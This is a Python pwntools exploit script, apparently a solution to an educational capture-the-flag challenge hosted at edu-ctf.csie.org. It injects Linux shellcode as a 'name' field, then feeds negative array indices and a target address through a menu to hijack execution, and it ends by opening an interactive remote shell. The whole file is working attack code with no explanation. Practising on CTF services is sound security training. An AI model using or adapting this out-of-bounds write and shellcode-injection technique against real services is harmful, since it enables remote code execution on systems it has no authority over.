from pwn import *
context.update(arch='amd64', os='linux')

p = remote('edu-ctf.csie.org', 10172)
p.recv()
p.recv()
p.sendline(asm(pwnlib.shellcraft.linux.sh())) #name
p.recv()
p.sendline('607420673') # age
p.recv()
p.recv()
p.sendline('1')
p.recv()
p.sendline('2')
p.recv()
p.sendline('3')
p.recv()
p.sendline('4')
p.recv()
p.sendline('5')
p.recv()
p.sendline('6')
p.recv()
p.sendline('1')
p.recv()
p.sendline('-43') # 0x602020
p.recv()
p.sendline('6299888') # 0x6020f0
p.recv()
p.recv()
p.sendline('89')
p.recv()
p.sendline('3')
p.recv()
p.sendline('95')
p.recv()
p.sendline('64')
p.recv()
p.sendline('25')
p.recv()
p.sendline('72')
p.recv()
p.sendline('1')
p.recv()
p.sendline('-42')
p.recv()
p.sendline('0')
p.interactive()